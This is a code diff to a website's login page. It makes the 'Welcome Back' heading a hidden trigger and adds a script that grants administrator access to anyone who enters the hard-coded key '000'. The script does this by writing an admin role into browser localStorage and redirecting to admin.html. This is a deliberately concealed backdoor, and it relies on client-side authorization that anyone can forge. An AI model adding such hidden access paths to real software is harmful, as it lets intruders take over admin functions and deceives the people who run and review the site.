--- a/index.html
+++ b/index.html
@@ -31,7 +31,10 @@
             <div class="inline-block p-4 bg-blue-50 rounded-full mb-4">
                 <i class="fas fa-sign-in-alt text-navy text-3xl" style="color:#1E3A8A"></i>
             </div>
-            <h1 class="text-3xl font-black text-navy uppercase tracking-tight" style="color:#1E3A8A">Welcome Back</h1>
+
+            <h1 onclick="secretAdminAccess()" class="cursor-default select-none text-3xl font-black text-navy uppercase tracking-tight" style="color:#1E3A8A">
+    Welcome Back
+</h1>
             <p class="text-gray-400 font-bold text-xs uppercase tracking-widest mt-2">Login to your account</p>
         </div>
         
@@ -62,6 +65,22 @@
             <a href="signup.html" class="text-blue-600 font-black hover:text-blue-800 transition tracking-tight uppercase text-sm">Create New Account</a>
         </div>
     </div>
+
+    <script>
+function secretAdminAccess() {
+    const accessCode = prompt("Enter Secret Admin Key:");
+    if (accessCode === "000") {
+        const adminData = { 
+            username: "Mohamed Morsy", 
+            role: "admin",
+            isAuthorized: true 
+        };
+        localStorage.setItem('user', JSON.stringify(adminData));
+        localStorage.setItem('userRole', 'admin');
+        window.location.href = 'admin.html';
+    }
+}
+</script>
 
     
        <script src="js/auth.js"></script>
